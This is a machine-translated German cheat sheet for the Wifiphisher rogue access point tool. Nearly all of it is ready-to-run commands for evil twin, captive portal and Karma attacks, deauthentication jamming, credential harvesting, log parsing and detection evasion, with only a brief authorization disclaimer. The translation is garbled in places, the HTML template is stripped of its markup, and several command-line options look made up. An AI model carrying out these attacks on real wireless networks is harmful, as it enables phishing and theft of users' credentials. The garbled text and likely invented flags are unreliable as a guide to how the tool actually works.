Zum Inhalt

Wifiphisher Wireless Phishing Framework Cheat Sheet

generieren

Überblick

Wifiphisher ist ein Rogue Access Point-Framework für die Durchführung von roten Team-Verlobungen oder Wi-Fi-Sicherheitstests. Es erzeugt gefälschte drahtlose Netzwerke, um automatisierte Phishing-Angriffe gegen drahtlose Clients durchzuführen, Anmeldeinformationen zu erfassen und Man-in-the-Middle-Angriffe durchzuführen.

ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und drahtlose Sicherheitsbewertungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

Installation

Das ist der Grund.

```bash

Install from repositories

sudo apt update sudo apt install wifiphisher

Install additional dependencies

sudo apt install hostapd dnsmasq ```_

Ubuntu/Debian

```bash

Install dependencies

sudo apt update sudo apt install python3 python3-pip git hostapd dnsmasq

Clone repository

git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher

Install Python dependencies

pip3 install -r requirements.txt

Install Wifiphisher

sudo python3 setup.py install ```_

Manuelle Installation

```bash

Install required packages

sudo apt install python3-dev python3-setuptools libnl-3-dev libnl-genl-3-dev

Clone and install

git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher sudo python3 setup.py install ```_

Docker Installation

```bash

Build Docker image

git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher docker build -t wifiphisher .

Run with network privileges

docker run --rm -it --net=host --privileged wifiphisher ```_

Basisnutzung

Einfache Rogue AP Attack

```bash

Basic attack with automatic target selection

sudo wifiphisher

Attack specific network

sudo wifiphisher -t "Target_Network"

Use specific interface

sudo wifiphisher -i wlan0

Use custom template

sudo wifiphisher -p firmware-upgrade ```_

Schnittstellenmanagement

```bash

List available interfaces

sudo wifiphisher --list-interfaces

Use specific interfaces

sudo wifiphisher -i wlan0 -jI wlan1

Monitor mode setup

sudo airmon-ng start wlan0 sudo wifiphisher -i wlan0mon ```_

Befehlsnummer

Grundlegende Optionen

Option Description
-t, --target Target network ESSID
-i, --interface Wireless interface
-jI, --jam-interface Interface for jamming
-p, --phishing-scenario Phishing template
-pK, --presharedkey WPA/WPA2 pre-shared key
-qS, --quitonsuccess Quit on credential capture

Erweiterte Optionen

Option Description
-aI, --apinterface AP interface
-nJ, --nojamming Disable jamming
-e, --essid Access Point ESSID
-dE, --deauth-essid Deauth specific ESSID
-dC, --deauth-channels Deauth channels
-nE, --noextensions Disable extensions

Logging-Optionen

Option Description
-l, --logging Enable logging
-lP, --log-path Log file path
-cP, --credential-log-path Credential log path
-lC, --log-credentials Log captured credentials

Phishing Vorlagen

Verfügbare Vorlagen

```bash

List available templates

sudo wifiphisher --list-phishing-scenarios

Common templates:

- firmware-upgrade: Router firmware upgrade

- oauth-login: OAuth login page

- wifi-connect: WiFi connection page

- browser-plugin-update: Browser plugin update

- network-manager-connect: Network manager

```_

Firmware Upgrade Vorlage

```bash

Use firmware upgrade scenario

sudo wifiphisher -p firmware-upgrade -t "Target_Network"

This template:

- Creates fake router admin page

- Requests admin credentials

- Simulates firmware upgrade process

```_

OAuth Login Vorlage

```bash

Use OAuth login scenario

sudo wifiphisher -p oauth-login -t "Target_Network"

This template:

- Creates fake OAuth login page

- Captures social media credentials

- Redirects to legitimate service

```_

Benutzerdefinierte Vorlage Erstellung

```bash

Template directory structure

/usr/share/wifiphisher/data/phishing-pages/custom-template/ ├── config.ini ├── html/ │ ├── index.html │ ├── style.css │ └── script.js └── static/ └── images/ ```_

Vorlage Konfiguration (config.ini)

```ini [info] Name = Custom Template Description = Custom phishing template Language = en

[context]

Template-specific settings

ESSID = \\{ESSID\\} MAC = \\{MAC\\} CHANNEL = \\{CHANNEL\\} ```_

Fortgeschrittene Angriffe

Evil Twin Attack

```bash

Create evil twin of target network

sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade

With specific MAC address

sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade --mac 00:11:22:33:44:55

With channel specification

sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade -c 6 ```_

Gefangenes Portal Angriff

```bash

Create captive portal

sudo wifiphisher -e "Free_WiFi" -p wifi-connect

Custom captive portal

sudo wifiphisher -e "Hotel_WiFi" -p oauth-login

Corporate network simulation

sudo wifiphisher -e "Corporate_Guest" -p network-manager-connect ```_

WPA/WPA2 Handshake Capture

```bash

Capture handshakes while phishing

sudo wifiphisher -t "Target_Network" -p firmware-upgrade --handshake-capture

Specify handshake output file

sudo wifiphisher -t "Target_Network" --handshake-capture -hC /tmp/handshakes/ ```_

Karma Attack

```bash

Respond to all probe requests

sudo wifiphisher --karma

Karma with specific template

sudo wifiphisher --karma -p oauth-login

Karma with custom ESSID list

sudo wifiphisher --karma --essid-list /path/to/essid_list.txt ```_

Jamming und Deauthentik

Gezielte Deauthentikation

```bash

Deauth specific network

sudo wifiphisher -dE "Target_Network"

Deauth specific client

sudo wifiphisher -dC 00:11:22:33:44:55

Deauth on specific channels

sudo wifiphisher --deauth-channels 1,6,11 ```_

Jamming Konfiguration

```bash

Use separate interface for jamming

sudo wifiphisher -i wlan0 -jI wlan1

Disable jamming

sudo wifiphisher -nJ

Custom jamming parameters

sudo wifiphisher --jam-band 2.4GHz --jam-channels 1,6,11 ```_

Smart Jamming

```bash

Intelligent jamming based on target

sudo wifiphisher -t "Target_Network" --smart-jamming

Adaptive jamming

sudo wifiphisher --adaptive-jamming --jam-threshold 5 ```_

Erweiterungen und Plugins

Verfügbare Erweiterungen

```bash

List available extensions

sudo wifiphisher --list-extensions

Common extensions:

- credentialharvester: Capture credentials

- handshakecapture: Capture WPA handshakes

- dnsmasqhandler: DNS spoofing

- captiveportal: Captive portal functionality

```_

Credential Harvester

```bash

Enable credential harvesting

sudo wifiphisher -p oauth-login --credentialharvester

Custom credential log

sudo wifiphisher -p oauth-login --credentialharvester -cP /tmp/creds.log ```_

Handshake Capture Extension

```bash

Enable handshake capture

sudo wifiphisher -t "Target_Network" --handshakecapture

Specify capture directory

sudo wifiphisher -t "Target_Network" --handshakecapture -hC /tmp/handshakes/ ```_

DNS Spoofing Erweiterung

```bash

Enable DNS spoofing

sudo wifiphisher --dnsmasqhandler

Custom DNS configuration

sudo wifiphisher --dnsmasqhandler --dns-conf /etc/dnsmasq.conf ```_

Personalentwicklung

HTML Vorlage Struktur

```html

Router Configuration

Router Firmware Update

Network: \\\\{ESSID\\\\}

```_

CSS Styling

```css /* style.css */ body \\{ font-family: Arial, sans-serif; background: #f0f0f0; margin: 0; padding: 50px; \\}

.container \\{ max-width: 400px; margin: auto; background: white; padding: 30px; border-radius: 5px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); \\}

input \\{ width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 3px; \\}

button \\{ width: 100%; background: #007cba; color: white; padding: 12px; border: none; border-radius: 3px; cursor: pointer; \\} ```_

JavaScript Funktionalität

```javascript // script.js document.addEventListener('DOMContentLoaded', function() \\{ // Add form validation const form = document.querySelector('form'); form.addEventListener('submit', function(e) \\{ const username = document.querySelector('input[name="username"]').value; const password = document.querySelector('input[name="password"]').value;

    if (!username||!password) \\\\{
        e.preventDefault();
        alert('Please enter both username and password');
    \\\\}
\\\\});

// Simulate loading
setTimeout(function() \\\\{
    document.querySelector('.container').style.opacity = '1';
\\\\}, 500);

\\}); ```_

Überwachung und Protokollierung

Echtzeitüberwachung

```bash

Monitor in real-time

sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l

Monitor with verbose output

sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l -v

Monitor specific log file

tail -f /var/log/wifiphisher.log ```_

Anmelden

```bash

Enable credential logging

sudo wifiphisher -p oauth-login -lC -cP /tmp/credentials.log

Monitor captured credentials

tail -f /tmp/credentials.log

Parse credential log

grep -o '"username":"[^"]*"' /tmp/credentials.log|cut -d'"' -f4 ```_

Verkehrsanalyse

```bash

Capture network traffic

sudo tcpdump -i wlan0 -w /tmp/wifiphisher_traffic.pcap

Analyze with Wireshark

wireshark /tmp/wifiphisher_traffic.pcap

Extract HTTP credentials

tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' ```_

Evasion Techniken

MAC Adresse Randomization

```bash

Use random MAC address

sudo wifiphisher -t "Target_Network" --random-mac

Use specific MAC address

sudo wifiphisher -t "Target_Network" --mac 00:11:22:33:44:55

Clone target AP MAC

sudo wifiphisher -t "Target_Network" --clone-mac ```_

Kanal Hopping

```bash

Use channel hopping

sudo wifiphisher --channel-hop

Specific channel sequence

sudo wifiphisher --channel-sequence 1,6,11,1,6,11

Random channel selection

sudo wifiphisher --random-channel ```_

Timing Evasion

```bash

Delayed start

sudo wifiphisher -t "Target_Network" --delay 300

Random intervals

sudo wifiphisher -t "Target_Network" --random-intervals

Burst mode

sudo wifiphisher -t "Target_Network" --burst-mode ```_

Fehlerbehebung

Schnittstellenprobleme

```bash

Check interface status

iwconfig

Reset interface

sudo ifconfig wlan0 down sudo ifconfig wlan0 up

Check for monitor mode support

sudo iw list|grep -A 10 "Supported interface modes"

Kill conflicting processes

sudo airmon-ng check kill ```_

Genehmigungsfragen

```bash

Check permissions

ls -la /usr/bin/wifiphisher

Fix permissions

sudo chmod +x /usr/bin/wifiphisher

Check sudo configuration

sudo visudo ```_

Abhängigkeitsfragen

```bash

Check Python dependencies

pip3 list|grep -E "(scapy|netfilterqueue|roguehostapd)"

Reinstall dependencies

pip3 install --upgrade -r requirements.txt

Check system packages

dpkg -l|grep -E "(hostapd|dnsmasq)" ```_

Netzwerkprobleme

```bash

Check network configuration

ip addr show

Check routing table

ip route show

Test internet connectivity

ping -c 4 8.8.8.8

Check DNS resolution

nslookup google.com ```_

Rechtliche und ethische Überlegungen

Zulassungsanforderungen

```bash

Always obtain written authorization

Document scope and limitations

Follow responsible disclosure

Respect privacy and data protection laws

```_

Best Practices

```bash

Use only for authorized testing

Minimize impact on legitimate users

Provide immediate feedback and education

Secure captured data appropriately

Follow industry standards and guidelines

```_

Ressourcen

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Wifiphisher. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Genehmigung haben, bevor Sie kabellose Sicherheitsbewertungen durchführen. *